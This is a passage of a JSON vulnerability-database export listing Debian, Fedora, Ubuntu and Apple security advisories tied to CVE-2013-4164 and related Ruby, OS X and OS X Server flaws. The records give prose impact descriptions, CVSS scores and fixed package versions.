packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2013-12-04T21:28:30", "published": "2013-12-04T21:28:30", "id": "DEBIAN:DSA-2809-1:8D55D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00223.html", "title": "[SECURITY] [DSA 2809-1] ruby1.8 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4164"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2013-12-14T02:48:01", "published": "2013-12-14T02:48:01", "id": "FEDORA:4921D21B74", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: ruby-2.0.0.353-16.fc20", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4073", "CVE-2013-4164"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2013-12-04T07:01:16", "published": "2013-12-04T07:01:16", "id": "FEDORA:9BC562114D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: ruby-2.0.0.353-16.fc19", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2065", "CVE-2013-4073", "CVE-2013-4164"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2013-12-11T02:01:24", "published": "2013-12-11T02:01:24", "id": "FEDORA:0AF5A221D6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: ruby-1.9.3.484-32.fc18", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4164"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-15-20-1 OS X Server 3.1.2\r\n\r\nOS X Server 3.1.2 is now available and addresses the following:\r\n\r\nRuby\r\nAvailable for: OS X Mavericks 10.9.3 or later\r\nImpact: Running a Ruby script that uses untrusted input to create a\r\nFloat object may lead to an application hang or arbitrary code\r\nexecution\r\nDescription: A heap-based buffer overflow issue existed in Ruby when\r\nconverting a string to a floating point value. An attacker could send\r\na specially crafted request to Profile Manager or to a Ruby script,\r\nwhich may lead to an application hang or arbitrary code execution.\r\nThis issue was addressed through additional validation of floating\r\npoint values.\r\nCVE-ID\r\nCVE-2013-4164\r\n\r\n\r\nOS X Server 3.1.2 may be obtained from Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJTe5cbAAoJEBcWfLTuOo7tHSAP/RTUSdVxw6bwbGQbCxNCM1rM\r\n8NOZEcU5WFTuMfr05Py9MUMiQjrmRYKnT8yTzRIOAzr+jPoRCdLwPimOEXvRnGQw\r\nEh9ayN04TJNG/t73XC+T5U+kqVhT/6/uI2wN/f5YwKbL8+sAsE8Rx3fbNgdZFJz4\r\nhC0pmjgomHlduBjmv3Ai+/GMhHqAkjGXy566Ahk+UShGGNx9cyjSYe4jsD1x+4jS\r\nXrG/NHlMLX/1cac/xpCt8BBJu00xtuR50Pfo/pXdT3CN7zcKocQjjDCRJ/n0g97w\r\nZZ5xBv/kLi+3NTStCyDm8gSv5A+0opXXrQ2fh4PGm3s3+O9yAM95zWfeIJg1SiQi\r\nFnA6zZE2JdbbQSIKLWKED0/bxWDAKhjHif1EoXL7yMxBqMXu+5eWEqDdc4LyzfWp\r\n7fdyb0sz2fPtpnnbhZPnCLIijxr9exHkrMU8lH8XsLayaL7O6cuJ+Gk5ZJHtC/YS\r\nL9uLZKB4VUUI6jHdDOmkbReDCm55WBXVvOBcnxQOfJicQB9hisLIYFEjO75RmYRP\r\nfkotB7oaz0OJb8IO8N/AO8UBWEeJu4KI2EDu+a02C6z8b4A6AZvOqdXNFbe9k2iK\r\nBkcmHmeMQASMl8tZykVlDrj0tNq3TqQbHs4UYhf9J1c807qqlIYA62g29wOphfzQ\r\nDdXqtjMTJ2wcDCaUbREX\r\n=a8IW\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-29T00:00:00", "published": "2014-05-29T00:00:00", "id": "SECURITYVULNS:DOC:30768", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30768", "title": "APPLE-SA-2014-15-20-1 OS X Server 3.1.2", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "cvelist": ["CVE-2013-2065", "CVE-2013-4164"], "description": "DoS, restrictions bypass.", "edition": 1, "modified": "2014-05-29T00:00:00", "published": "2014-05-29T00:00:00", "id": "SECURITYVULNS:VULN:13434", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13434", "title": "Ruby security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-2065", "CVE-2013-4164"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2035-1\r\nNovember 27, 2013\r\n\r\nruby1.8, ruby1.9.1 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 13.10\r\n- Ubuntu 13.04\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Ruby.\r\n\r\nSoftware Description:\r\n- ruby1.8: Object-oriented scripting language\r\n- ruby1.9.1: Object-oriented scripting language\r\n\r\nDetails:\r\n\r\nCharlie Somerville discovered that Ruby incorrectly handled floating point\r\nnumber conversion. An attacker could possibly use this issue with an\r\napplication that converts text to floating point numbers to cause the\r\napplication to crash, resulting in a denial of service, or possibly execute\r\narbitrary code. &#40;CVE-2013-4164&#41;\r\n\r\nVit Ondruch discovered that Ruby did not perform taint checking for certain\r\nfunctions. An attacker could possibly use this issue to bypass certain\r\nintended restrictions. &#40;CVE-2013-2065&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 13.10:\r\n libruby1.8 1.8.7.358-7ubuntu2.1\r\n libruby1.9.1 1.9.3.194-8.1ubuntu2.1\r\n ruby1.8 1.8.7.358-7ubuntu2.1\r\n ruby1.9.1 1.9.3.194-8.1ubuntu2.1\r\n\r\nUbuntu 13.04:\r\n libruby1.8 1.8.7.358-7ubuntu1.2\r\n libruby1.9.1 1.9.3.194-8.1ubuntu1.2\r\n ruby1.8 1.8.7.358-7ubuntu1.2\r\n ruby1.9.1 1.9.3.194-8.1ubuntu1.2\r\n\r\nUbuntu 12.10:\r\n libruby1.8 1.8.7.358-4ubuntu0.4\r\n libruby1.9.1 1.9.3.194-1ubuntu1.6\r\n ruby1.8 1.8.7.358-4ubuntu0.4\r\n ruby1.9.1 1.9.3.194-1ubuntu1.6\r\n\r\nUbuntu 12.04 LTS:\r\n libruby1.8 1.8.7.352-2ubuntu1.4\r\n libruby1.9.1 1.9.3.0-1ubuntu2.8\r\n ruby1.8 1.8.7.352-2ubuntu1.4\r\n ruby1.9.1 1.9.3.0-1ubuntu2.8\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2035-1\r\n CVE-2013-2065, CVE-2013-4164\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/ruby1.8/1.8.7.358-7ubuntu2.1\r\n https://launchpad.net/ubuntu/+source/ruby1.9.1/1.9.3.194-8.1ubuntu2.1\r\n https://launchpad.net/ubuntu/+source/ruby1.8/1.8.7.358-7ubuntu1.2\r\n https://launchpad.net/ubuntu/+source/ruby1.9.1/1.9.3.194-8.1ubuntu1.2\r\n https://launchpad.net/ubuntu/+source/ruby1.8/1.8.7.358-4ubuntu0.4\r\n https://launchpad.net/ubuntu/+source/ruby1.9.1/1.9.3.194-1ubuntu1.6\r\n https://launchpad.net/ubuntu/+source/ruby1.8/1.8.7.352-2ubuntu1.4\r\n https://launchpad.net/ubuntu/+source/ruby1.9.1/1.9.3.0-1ubuntu2.8\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-12-01T00:00:00", "published": "2013-12-01T00:00:00", "id": "SECURITYVULNS:DOC:30039", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30039", "title": "[USN-2035-1] Ruby vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-1318", "CVE-2014-1316", "CVE-2014-1319", "CVE-2014-1322", "CVE-2014-1296", "CVE-2014-1320", "CVE-2013-5170", "CVE-2014-1295", "CVE-2013-6393", "CVE-2014-1321", "CVE-2014-1315", "CVE-2014-1314", "CVE-2013-4164"], "description": "Information disclosures, memory corruptions, DoS, privilege escalations, protection bypass.", "edition": 1, "modified": "2014-05-30T00:00:00", "published": "2014-05-30T00:00:00", "id": "SECURITYVULNS:VULN:13795", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13795", "title": "Apple Mac OS X multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-1318", "CVE-2014-1316", "CVE-2014-1319", "CVE-2014-1322", "CVE-2014-1296", "CVE-2014-1320", "CVE-2013-5170", "CVE-2014-1295", "CVE-2013-6393", "CVE-2014-1321", "CVE-2014-1315", "CVE-2014-1314", "CVE-2013-4164"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-04-22-1 Security Update 2014-002\r\n\r\nSecurity Update 2014-002 is now available and addresses the\r\nfollowing:\r\n\r\nCFNetwork HTTPProtocol\r\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\r\nOS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: An attacker in a privileged network position can obtain web\r\nsite credentials\r\nDescription: Set-Cookie HTTP headers would be processed even if the\r\nconnection closed before the header line was complete. An attacker\r\ncould strip security settings from the cookie by forcing the\r\nconnection to close before the security settings were sent, and then\r\nobtain the value of the unprotected cookie. This issue was addressed\r\nby ignoring incomplete HTTP header lines.\r\nCVE-ID\r\nCVE-2014-1296 : Antoine Delignat-Lavaud of Prosecco at Inria Paris\r\n\r\nCoreServicesUIAgent\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: Visiting a maliciously crafted website or URL may result in\r\nan unexpected application termination or arbitrary code execution\r\nDescription: A format string issue existed in the handling of URLs.\r\nThis issue was addressed through additional validation of URLs. This\r\nissue does not affect systems prior to OS X Mavericks.\r\nCVE-ID\r\nCVE-2014-1315 : Lukasz Pilorz of runic.pl, Erik Kooistra\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5\r\nImpact: Opening a maliciously crafted PDF file may result in an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer underflow existed in the handling of fonts in\r\nPDF files. This issue was addressed through additional bounds\r\nchecking. This issue does not affect OS X Mavericks systems.\r\nCVE-ID\r\nCVE-2013-5170 : Will Dormann of CERT/CC\r\n\r\nHeimdal Kerberos\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: A remote attacker may be able to cause a denial of service\r\nDescription: A reachable abort existed in the handling of ASN.1\r\ndata. This issue was addressed through additional validation of ASN.1\r\ndata.\r\nCVE-ID\r\nCVE-2014-1316 : Joonas Kuorilehto of Codenomicon\r\n\r\nImageIO\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: Viewing a maliciously crafted JPEG image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow issue existed in ImageIO&#39;s handling\r\nof JPEG images. This issue was addressed through improved bounds\r\nchecking. This issue does not affect systems prior to OS X Mavericks.\r\nCVE-ID\r\nCVE-2014-1319 : Cristian Draghici of Modulo Consulting, Karl Smith of\r\nNCC Group\r\n\r\nIntel Graphics Driver\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: A malicious application can take control of the system\r\nDescription: A validation issue existed in the handling of a pointer\r\nfrom userspace. This issue was addressed through additional\r\nvalidation of pointers.\r\nCVE-ID\r\nCVE-2014-1318 : Ian Beer of Google Project Zero working with HP&#39;s\r\nZero Day Initiative\r\n\r\nIOKit Kernel\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: A local user can read kernel pointers, which can be used to\r\nbypass kernel address space layout randomization\r\nDescription: A set of kernel pointers stored in an IOKit object\r\ncould be retrieved from userland. This issue was addressed through\r\nremoving the pointers from the object.\r\nCVE-ID\r\nCVE-2014-1320 : Ian Beer of Google Project Zero working with HP&#39;s\r\nZero Day Initiative\r\n\r\nKernel\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: A local user can read a kernel pointer, which can be used to\r\nbypass kernel address space layout randomization\r\nDescription: A kernel pointer stored in a XNU object could be\r\nretrieved from userland. This issue was addressed through removing\r\nthe pointer from the object.\r\nCVE-ID\r\nCVE-2014-1322 : Ian Beer of Google Project Zero\r\n\r\nPower Management\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: The screen might not lock\r\nDescription: If a key was pressed or the trackpad touched just after\r\nthe lid was closed, the system might have tried to wake up while\r\ngoing to sleep, which would have caused the screen to be unlocked.\r\nThis issue was addressed by ignoring keypresses while going to sleep.\r\nThis issue does not affect systems prior to OS X Mavericks.\r\nCVE-ID\r\nCVE-2014-1321 : Paul Kleeberg of Stratis Health Bloomington MN,\r\nJulian Sincu at the Baden-Wuerttemberg Cooperative State University\r\n&#40;DHBW Stuttgart&#41;, Gerben Wierda of R&amp;A, Daniel Luz\r\n\r\nRuby\r\nAvailable for: OS X Mavericks v10.9.2\r\nImpact: Running a Ruby script that handles untrusted YAML tags may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer overflow issue existed in LibYAML&#39;s handling\r\nof YAML tags. This issue was addressed through additional validation\r\nof YAML tags. This issue does not affect systems prior to OS X\r\nMavericks.\r\nCVE-ID\r\nCVE-2013-6393\r\n\r\nRuby\r\nAvailable for: OS X Lion v10.7.5, OS X Lion Server v10.7.5,\r\nOS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: Running a Ruby script that uses untrusted input to create a\r\nFloat object may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A heap-based buffer overflow issue existed in Ruby when\r\nconverting a string to a floating point value. This issue was\r\naddressed through additional validation of floating point values.\r\nCVE-ID\r\nCVE-2013-4164\r\n\r\nSecurity - Secure Transport\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: An attacker with a privileged network position may capture\r\ndata or change the operations performed in sessions protected by SSL\r\nDescription: In a &#39;triple handshake&#39; attack, it was possible for an\r\nattacker to establish two connections which had the same encryption\r\nkeys and handshake, insert the attacker&#39;s data in one connection, and\r\nrenegotiate so that the connections may be forwarded to each other.\r\nTo prevent attacks based on this scenario, Secure Transport was\r\nchanged so that, by default, a renegotiation must present the same\r\nserver certificate as was presented in the original connection. This\r\nissue does not affect Mac OS X 10.7 systems and earlier.\r\nCVE-ID\r\nCVE-2014-1295 : Antoine Delignat-Lavaud, Karthikeyan Bhargavan and\r\nAlfredo Pironti of Prosecco at Inria Paris\r\n\r\nWindowServer\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.2\r\nImpact: Maliciously crafted applications can execute arbitrary code\r\noutside the sandbox\r\nDescription: WindowServer sessions could be created by sandboxed\r\napplications. This issue was addressed by disallowing sandboxed\r\napplications from creating WindowServer sessions.\r\nCVE-ID\r\nCVE-2014-1314 : KeenTeam working with HP&#39;s Zero Day Initiative\r\n\r\nNote: Security Update 2014-002 for OS X Mavericks systems includes\r\nthe security content of Safari 7.0.3:\r\nhttp://support.apple.com/kb/HT6181\r\n\r\nSecurity Update 2014-002 may be obtained via the Apple Software\r\nUpdate application, and from the Apple&#39;s Software Downloads web\r\nsite: http://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJTVqgEAAoJEPefwLHPlZEw0L8P/RIqgQPc1/RnmPBCKVnZ0QyI\r\n8V9jV07LyXTPySL3at/sAFac148ZYqu9cSKtRWB1oAQCnC8C20EIDLBvsysmKT/a\r\nzqLUP8ZGcd4jC4UYUleVgl4U9SXkp0L/HwpASXeRHGeUd/tN4eCBEgDfKSMdm8/s\r\n4S70gTQPRRsQR3D8RkcOITJVFCaDFy/em3AbEJyAm7yDsDOinJdRrirRe7W1Q/p6\r\nKBOmQYb73m0ykg08jgCjohxhTE9gpNeMeR7smN+7GsRb6XFlUOJGtnlePyLm1hN3\r\n85e0KRnQyhTGXJ7y6MTmKzzwJ6/iVZvEeXK1IFwXEkwLLmp5uhp7wfT3DkZZSnBm\r\n+uo5g2aSQ80+7ZR9psUQwXOn8/6cFyKbG5tHxkh8IY6qLacvHP5yBcw3gqlUNPg5\r\n2vCNWqhL8fEqncx7K1QC8CxwLQMVw9QnolukdjOxT66+kI0F/mDGeGdf/mYkGBJF\r\nZECjWZsoekGq4TMu75MPn8BlwFpaLnObPi9pC+56BDhEz7f39bqBvkAaW61cQgj4\r\nlRwlEHWNBFlO9XVkQwdmYrZoaeAAVxGG+iPt225dmXXZtWGMs5nYIzPj8GzRoNWQ\r\ngYAGZAOBr6pGJCQmfJIy4tLKj0H9za9pxX9RqavKrZyEtTcxpUmrh91mGZiI4eo0\r\n7hmpILk22+6xv6pWCw8D\r\n=WWPv\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30550", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30550", "title": "APPLE-SA-2014-04-22-1 Security Update 2014-002", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-1318", "CVE-2014-1316", "CVE-2014-1319", "CVE-2014-1322", "CVE-2014-1296", "CVE-2014-1320", "CVE-2013-5170", "CVE-2014-1295", "CVE-2013-6393", "CVE-2014-1321", "CVE-2014-1315", "CVE-2014-1314", "CVE-2013-4164"], "description": "Unsafe cookie handling, code execution via different formats and protocols, privilege escalation, information leakage.", "edition": 1, "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "SECURITYVULNS:VULN:13711", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13711", "title": "Apple Mac OS X multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-3566", "CVE-2014-4424", "CVE-2014-4406", "CVE-2013-3919", "CVE-2014-0065", "CVE-2014-0064", "CVE-2014-0591", "CVE-2014-0063", "CVE-2013-6393", "CVE-2014-0060", "CVE-2014-0062", "CVE-2014-4446", "CVE-2013-4854", "CVE-2014-0066", "CVE-2013-4164", "CVE-2014-4447", "CVE-2014-0061"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-10-16-3 OS X Server v4.0\r\n\r\nOS X Server v4.0 is now available and addresses the following:\r\n\r\nBIND\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Multiple vulnerabilities in BIND, the most serious of which\r\nmay lead to a denial of service\r\nDescription: Multiple vulnerabilities existed in BIND. These issues\r\nwere addressed by updating BIND to version 9.9.2-P2\r\nCVE-ID\r\nCVE-2013-3919\r\nCVE-2013-4854\r\nCVE-2014-0591\r\n\r\nCoreCollaboration\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: A remote attacker may be able to execute arbitrary SQL\r\nqueries\r\nDescription: A SQL injection issue existed in Wiki Server. This\r\nissue was addressed through additional validation of SQL queries.\r\nCVE-ID\r\nCVE-2014-4424 : Sajjad Pourali &#40;sajjad@securation.com&#41; of CERT of\r\nFerdowsi University of Mashhad\r\n\r\nCoreCollaboration\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-site scripting issue existed in Xcode Server.\r\nThis issue was addressed through improved encoding of HTML output.\r\nCVE-ID\r\nCVE-2014-4406 : David Hoyt of Hoyt LLC\r\n\r\nCoreCollaboration\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Multiple vulnerabilities in PostgreSQL, the most serious of\r\nwhich may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in PostgreSQL. These\r\nissues were addressed by updating PostgreSQL to version 9.2.7.\r\nCVE-ID\r\nCVE-2014-0060\r\nCVE-2014-0061\r\nCVE-2014-0062\r\nCVE-2014-0063\r\nCVE-2014-0064\r\nCVE-2014-0065\r\nCVE-2014-0066\r\n\r\nMail Service\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Group SACL changes for Mail may not be respected until after\r\na restart of the Mail service\r\nDescription: SACL settings for Mail were cached and changes to the\r\nSACLs were not respected until after a restart of the Mail service.\r\nThis issue was addressed by resetting the cache upon changes to the\r\nSACLs.\r\nCVE-ID\r\nCVE-2014-4446 : Craig Courtney\r\n\r\nProfile Manager\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Multiple vulnerabilities in LibYAML, the most serious of\r\nwhich may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in LibYAML. These\r\nissues were addressed by switching from YAML to JSON as Profile\r\nManager&#39;s internal serialization format.\r\nCVE-ID\r\nCVE-2013-4164\r\nCVE-2013-6393\r\n\r\nProfile Manager\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: A local user may obtain passwords after setting up or\r\nediting profiles in Profile Manager\r\nDescription: In certain circumstances, setting up or editing\r\nprofiles in Profile Manager may have logged passwords to a file. This\r\nissue was addressed through improved handling of credentials.\r\nCVE-ID\r\nCVE-2014-4447 : Mayo Jordanov\r\n\r\nServer\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: An attacker may be able to decrypt data protected by SSL\r\nDescription: There are known attacks on the confidentiality of SSL\r\n3.0 when a cipher suite uses a block cipher in CBC mode. An attacker\r\ncould force the use of SSL 3.0, even when the server would support a\r\nbetter TLS version, by blocking TLS 1.0 and higher connection\r\nattempts. This issue was addressed by disabling SSL 3.0 support in\r\nWeb Server, Calendar &amp; Contacts Server, and Remote Administration.\r\nCVE-ID\r\nCVE-2014-3566 : Bodo Moeller, Thai Duong, and Krzysztof Kotowicz of\r\nGoogle Security Team\r\n\r\nServerRuby\r\nAvailable for: OS X Yosemite v10.10 or later\r\nImpact: Running a Ruby script that handles untrusted YAML tags may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer overflow issue existed in LibYAML&#39;s handling\r\nof YAML tags. This issue was addressed through additional validation\r\nof YAML tags. This issue does not affect systems prior to OS X\r\nMavericks.\r\nCVE-ID\r\nCVE-2013-6393\r\n\r\n\r\nOS X Server v4.0 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple&#39;s Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.22 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\n\r\niQIcBAEBAgAGBQJUQCLKAAoJEBcWfLTuOo7tqr0P/1fGVeD8xAAgMRpH/hYYkKpj\r\nCGKAUBfTXM9clAhUHP1Es+T1qG67JX9CNrrl5yKMQCupojgNIkO1D0Pj5QlLZzkL\r\nHR6AgI8eYeykiw8VRFI8DC7f3q/A1aRrijj8bPQ6BoPUq28Vya/GjEAMxV1l21l1\r\nqLyNiDH8X8DC/CWyxOXVMD4yqIpzCOPEIAvgV1aB0z1UEdw7fLLBCEIAkNR3tL9M\r\n5OlRT8X4dzpx3YpTvlB9s7zIAPtLgTjcVpPbkT2yJ9OZsewml2aFM7NWDYpYhIRg\r\nz7bOMmKZep15a+XeXH7cdqXMfHW/XGdkYF/4Z85wHG44Kebaikq+K0XoTxjHlqXi\r\n9rtNdcwh+p4DxTQNO0fK7WbfAo7FiF6aonY9D9hp47jbhB9KODVeOpqo6B7sOudq\r\ntBAAS1pBbrsULUWRCZRaN3LlPigtInqIIPuLGVQx4ApUo1guxXb0A88ZU3yiR+Bl\r\nRJHAEoevKjqhLiZDt1V8sSk6sPAh7p02deP5RDIwNJfapP+RrXoJ6knexRD44kNb\r\nMwVD6a2EcOoRFgwcjvgFZ1etpoHT/VAs7Ql/GjWN5snDLsZ/vlGtSPn1i3kjkxBZ\r\noYDmJfC91RoC6exW7img3H9csN0sgtVGJRLrf6cdg41EjVjQaUUVQfBn/DVVyMb8\r\nfIWnhQEvESJVqfrk3Q3X\r\n=LbVb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-18T00:00:00", "published": "2014-10-18T00:00:00", "id": "SECURITYVULNS:DOC:31300", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31300", "title": "APPLE-SA-2014-10-16-3 OS X Server v4.0", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-4433", "CVE-2014-3566", "CVE-2014-4371", "CVE-2014-4430", "CVE-2014-4437", "CVE-2014-4405", "CVE-2014-4351", "CVE-2014-4422", "CVE-2014-4424", "CVE-2014-4441", "CVE-2014-4428", "CVE-2014-4444", "CVE-2014-4388", "CVE-2014-7169", "CVE-2014-4391", "CVE-2014-4443", "CVE-2014-4375", "CVE-2014-4406", "CVE-2014-4421", "CVE-2014-0098", "CVE-2013-3919", "CVE-2014-4440", "CVE-2014-0065", "CVE-2014-4431", "CVE-2013-6438", "CVE-2014-4408", "CVE-2014-4426", "CVE-2014-3537", "CVE-2014-0064", "CVE-2014-0591", "CVE-2014-4439", "CVE-2014-0063", "CVE-2014-4438", "CVE-2013-5150", "CVE-2014-6271", "CVE-2013-6393", "CVE-2014-4434", "CVE-2014-0060", "CVE-2014-4425", "CVE-2014-4417", "CVE-2014-4442", "CVE-2014-0062", "CVE-2014-4446", "CVE-2014-4418", "CVE-2014-4404", "CVE-2014-4420", "CVE-2013-4854", "CVE-2014-0066", "CVE-2014-4427", "CVE-2014-4435", "CVE-2011-2391", "CVE-2014-4407", "CVE-2013-4164", "CVE-2014-4447", "CVE-2014-4436", "CVE-2014-4432", "CVE-2014-4380", "CVE-2014-0061", "CVE-2014-4364", "CVE-2014-4419", "CVE-2014-4373"], "description": "62 vulnerabilities in different system components.", "edition": 1, "modified": "2014-10-18T00:00:00", "published": "2014-10-18T00:00:00", "id": "SECURITYVULNS:VULN:14050", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14050", "title": "Apple OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, 